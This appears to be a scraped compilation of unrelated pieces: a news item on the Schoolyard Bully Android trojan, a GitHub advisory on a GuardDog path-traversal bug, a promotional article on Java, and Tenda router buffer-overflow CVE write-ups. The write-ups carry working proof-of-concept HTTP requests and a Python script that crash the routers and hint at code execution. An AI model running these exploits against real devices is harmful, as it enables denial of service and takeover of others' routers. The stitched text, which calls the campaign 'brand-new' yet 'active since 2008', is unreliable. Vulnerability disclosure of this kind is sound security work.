By Deeba Ahmed
The campaign is ongoing, and so far, Schoolyard Bully Malware has victimized over 300,000 Facebook users on Android devices across 71 countries.
This is a post from HackRead.com Read the original post: Schoolyard Bully Malware Stealing Facebook Credentials on Android

Mobile security company Zimperium’s zLabs has released a warning about a notorious Android trojan that has stolen around 300,000 credentials of Facebook users.

According to zLabs, Schoolyard Bully malware is the name of malware used in a brand-new Android threat campaign that has been active since at least 2008. The attackers specifically target Facebook user credentials, and the malware is found in several applications downloaded from **third-party app stores** and the Google Play Store.

The malware’s primary targets are based in Vietnam. However, zLabs researchers claim that over 300,000 victims have been identified so far, and they are located in 71 different countries since the apps were available via third-party app stores while Google Play Store has removed them from its official store.

**Trojan Details**

Schoolyard Bully malware is delivered via harmless-looking Android apps, mostly educational apps. Malicious code is hidden inside these apps, which can **steal Facebook credentials** and upload them to the Firebase C&C for threat actors. The trojan relies on JavaScript injections to display phishing pages that lure users into handing over their Facebook username/password. 

Threat actors leverage the trojan to obtain user credentials and successfully access financial accounts. Around 64% of the users used the same passwords already exposed in an earlier breach. Perhaps, this has allowed the trojan to remain active for years.

To remain hidden from antivirus software and machine learning virus detections, Schoolyard Bully Trojan uses native libraries such as libabc.so to store the stolen data. Data strings are hidden from detection software through further encoding. Moreover, the malicious educational apps are hidden in a **password-protected ZIP**.

Malicious apps (left) – Facebook phishing page (right) – Image credit: Zimperium

**What Date can be Stolen?**

The Schoolyard Bully malware can steal sensitive data from innocent users’ Facebook accounts, including user ID, password, email ID, phone number, Facebook profile name, Facebook ID, and device-related information such as device RAM and API.

Zimperium researchers have **released technical information** about the campaign and its indicators of compromises, which can help detect Schoolyard Bully malware.

1.  **9 apps with 6M installs stole Facebook logins of Android users**
2.  **Mandrake Android malware stealing Facebook, crypto data since 2016**
3.  **Fake Netflix, WhatsApp, Facebook Android Apps Contain SpyNote RAT**
4.  **Facebook removes 100s of accounts for spreading iOS, Android malware**
5.  **Cookiethief Android malware hacks Facebook accounts without password**

Schoolyard Bully Malware Stealing Facebook Credentials on Android

### Impact

Running GuardDog against a specially-crafted package can allow an attacker to write an arbitrary file on the machine where GuardDog is executed.

This is due to a path traversal vulnerability when extracting the `.tar.gz` file of the package being scanned, which exists by design in the `tarfile.TarFile.extractall` function. See also https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall

### Remediation

Upgrade to GuardDog v0.1.5 or more recent.

### References

* https://semgrep.dev/r?q=trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal
* https://www.trellix.com/en-us/about/newsroom/stories/research/tarfile-exploiting-the-world.html
* https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-rp2v-v467-q9vq

**GuardDog vulnerable to arbitrary file write when scanning a specially-crafted PyPI package**

Moderate severity GitHub Reviewed Published Dec 2, 2022 in DataDog/guarddog

**Package**

pip guarddog (pip)

**Affected versions**

< 0.1.5

**Description**

**Severity**

**CVSS base metrics**

User interaction

Required

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L

**Weaknesses**

**GHSA ID**

GHSA-rp2v-v467-q9vq

**Source code**

GHSA-rp2v-v467-q9vq: GuardDog vulnerable to arbitrary file write when scanning a specially-crafted PyPI package

By Owais Sultan
Java is one of the most well-known programming languages and software platforms that is used on countless devices…
This is a post from HackRead.com Read the original post: 8 Reasons Why Enterprises Use Java

Java is one of the most well-known **programming languages** and software platforms that is used on countless devices such as mobile phones, laptop computers, etc. It is a reliable and scalable solution for the development of enterprise systems as well as web applications.

In this article, we will describe a few specifications of this programming language that make it so popular for building **enterprise-grade software**. So, upcoming is a short list of what Java is used for and the eight main reasons why business owners decide to go for java enterprise application development.

**What is an enterprise application in java?**

An enterprise application in Java is a software program whose backend was created with the help of the Java programming language. Java is an excellent choice for creating back-end functionality.

In addition, the use of Java microservices enables the creation of large-scale, complex but well-performing solutions, that’s why it is often chosen by enterprises that are dealing with large amounts of data and need to create multi-functional **complex solutions** for their business.

**What is Java used for?**

**Desktop Applications**

There are numerous features that Java language offers. The existence of its frameworks such as **AWT, Swing, and JavaFX** provide developers with a series of useful elements like buttons, menus, and form fields making it easier for engineers to create a series of functional desktop apps. Another opportunity is the creation of sophisticated 3D graphical apps thanks to the use of APIs and multiple functionalities. 

**Web-Based Applications**

Java’s popularity is mostly thanks to the fact that it helps create elegant and functional web applications. Together with .NET, Python, and Node.js, Java plays an important role in the modern web back-end world as we know it. Java is one of the most commonly used development languages to build the back-end of web apps using technologies or tools like Struts or servlets, JSP, JSF, or Spring.

**Big Data Technology **

Big Data is a combination of methods and techniques to analyze and process complex and vast datasets in order to unveil patterns, trends, and other relevant information which helps businesses make smart data-driven decisions. Data scientists process massive amounts of datasets using Spark as a tool and a Java framework like Hadoop as a backup. 

*   **Why use Java in Big Data?** 

Java is among the most popular programming languages for Big Data engineers. Most of the modern tools Big Data analysts use as well as their ecosystems are written on the basis of Java: Hadoop, Hive, **MapReduce**, and Storm. Those platforms which are not written in Java, are written in Scala (like Spark) and after knowing Java Scala is a lot easier to learn than for those who know only Python. Besides, Java is very convenient for creating complex scalable enterprise applications, which are capable of collecting and processing data.

*   **Best Big Data tools for Java developers**

The majority of modern tools for collecting, processing, storing, and analyzing data are written with the help of Java or its relative language – **Scala**: **Hadoup**, Storm, Spark, Mahout. Java also has a large community of fans and a vast open-source base which enables the creation of new tools quite frequently.

**Internet of Things (IoT) Software**

The **Internet of Things** is a system of connected devices that make our life easier in many aspects. The devices range from wearables, TVs, and smartwatches to smart electric switches, security panels, and other useful objects.

This is where Java comes into action, as it is one of the primary programming languages for the Internet of Things as it was created to run on various platforms and devices. Java flexibility, security, and a rich library base make it an excellent choice for the task of allowing humans to manage, control and efficiently use hardware devices.

**Cloud-Based Apps**

As simple as it is, cloud computing is the **on-demand provision of IT resources** on the internet that include servers, storage, databases, and networking with accessible pricing models. This means that cloud-based applications make extensive use of Java as businesses use it to create cloud-based SaaS, IaaS, and PaaS services due to the low cost and extensive usage. 

**3 main reasons**

1.  Thanks to its distributed nature
2.  It features building apps used in SaaS, IaaS, and PaaS 
3.  Provides Java development tools such as Oracle Java

**Mobile Apps **

Java uses a cross-platform framework J2ME to create mobile apps that have the objective to function on smartphones. One of the most useful operating systems for mobile apps is Android, which is based on Java. Additionally, Java is also compatible with AndroidStudio and Kotlin.

**Examples of mobile apps written using Java: **

*   Social media: Tinder
*   Location App: Google Earth
*   Service Apps: Uber, CashApp
*   Entertainment: Netflix, Twitter, Spotify

**Enterprise Applications **

Why should you use java for enterprise apps? Because it’s only among the few programming languages that offer the needed scalability, flexibility, and security. Java enterprise applications require. a lot more resources, power, and nuances than ordinary apps. Here Java plays a significant role in the build and deployment of enterprise applications thanks to its robust features and outstanding performance.

In addition, Java improves performance and strengthens the enterprise apps’ security, documentation process, maintainability, and troubleshooting.

**8 reasons to choose Java for Enterprise Applications**

Java enterprise software development is very common for the same reason that Java presents advantages in comparison to other programming languages, its robust nature being one of the main ones. However, the following list will give a clear scope of why java is used so often as a tool for programming various software systems. 

1.  Its complexity level is low, it is easy to write, compile and/or debug. 
2.  It is object-oriented allowing the creation of modular programs and reusable code.
3.  It is cloud independent as it moves easily from one computer system to another. 

The above section explains in detail what Java is used for. The following portion of the information is to give a clear scope and the reasons to choose Java for enterprises even when **outsourcing java development** services. 

**Stable Language**

Among **all programming languages**, Java has the highest stability. Besides gaining stability in growth, it has developed into a stable language as well. This is the reason why firms around the world hire Java experts, to create solutions that use the needed technology to attain stability. One thing that has helped this stability is the use of different testing methods to remove faults. Additionally, it allows the creation of programs that do not require a lot of upkeep. 

**Scalability **

Scalability is the capacity for something to be changed in size or scale. In technological terms, it is the versatility with which a computing method can be applied or produced. Java is used to build applications that are easy to handle any growing workload. 

**High Speed and Performance**

In addition to the stability and scalability, Java leverages multi-threading and less memory use to achieve improved performance. It is a quick-moving technology that helps programmers provide solutions instantly. Companies that require fast and efficient results rely on programming languages to power up their products. 

**Extensive and Active Community**

Java fosters innovative and analytical thinking in all types of developers and designers. It helps large engineering firms with the greatest information networks expand. Everything is free, and it is a pleasure to create, offer, and receive professional advice on Java application development.

**Cross-Platform Compatibility**

Operating systems including Mac OS, Unix, and Windows can easily run Java applications thanks to the **Java Virtual Machine (JVM)**. The Java apps can be run on any device with a contemporary processor. It is possible to manage multiple threads since JVM has been optimized for operation on potent multi-core machines.

**Various Libraries**

Java Libraries are crucial for creating enterprise applications because they enable the addition of new features, the resolution of frequent issues, or the discovery of novel development techniques. It is simpler for developers to use free and open-source libraries for practical applications because they have business-friendly licenses.

**Platform-Independence**

Java is used on enterprise software applications due to being a platform-independent language. There is no need to repeat tasks, the moment a code is developed it can be dragged across a variety of platforms without having to redo the code. In short, developers use this and work on building Java enterprise applications without worrying about the platforms they are building them for.

**Economic Maintenance**

When choosing enterprise software development with java, firms must think of the economical aspects as well. Java’s clear nature makes it cheap and simple to create. Programmers dealing with it can run it on any computer, regardless of hardware, which significantly reduces high costs. 

**Conclusion**

Java is a programming language that is the first choice by many, whether engineers or enterprises. In general terms, it is a programming language that has been and will continue to be used. It has the proper characteristics and components to produce adaptive applications in different businesses and start-ups.

Enterprise applications in Java are scalable, resilient, secure, and highly maintainable, which is why we believe this trend will continue and Java will be in demand for years to come.

8 Reasons Why Enterprises Use Java

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/SetIpMacBind request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/SetIpMacBind page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/SetIpMacBind HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 453
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    bindnum=1&list=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\n
    

Using A\*428 to padding, we can control PC register

CVE-2022-45657: CVE-vulns/fromSetIpMacBind.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the devName parameter in the formSetDeviceName function.

CVE-2022-45648: CVE-vulns/formSetDeviceName.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceId parameter in the addWifiMacFilter function.

CVE-2022-45643: CVE-vulns/addWifiMacFilter_deviceId.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the deviceMac parameter in the addWifiMacFilter function.

CVE-2022-45645: CVE-vulns/addWifiMacFilter_derviceMac.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 is vulnerable to Buffer Overflow via formSetMacFilterCfg.

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/formSetMacFilterCfg request.

This vulnerability lies in the /goform/formSetMacFilterCfg page，The details are shown below:

This POC can result in a Dos.

    POST /goform/setMacFilterCfg HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 182
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/mac_filter.html?random=0.4768296248219275&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=eeg1qw
    Connection: close
    
    macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\r11

CVE-2022-45641: CVE-vulns/formSetMacFilterCfg.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk\_crypto parameter in the fromSetWirelessRepeat function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/WifiExtraSet page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/WifiExtraSet HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 247
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    wifi_chkHz=1&wl_mode=wisp&wl_enbale=1&country_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk_key=11111111&security=wpapsk&wpapsk_type=wpa&wpapsk_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

CVE-2022-45659: CVE-vulns/fromSetWirelessRepeat.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setUplinkInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setUplinkInfo, pingHostIp1 is controlled by the user and will be spliced into auto\_ping\_ip by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'upLinkEn=true&pingHostIp1=' + p1

p3 \= b"POST /goform/setUplinkInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

Tag

#mac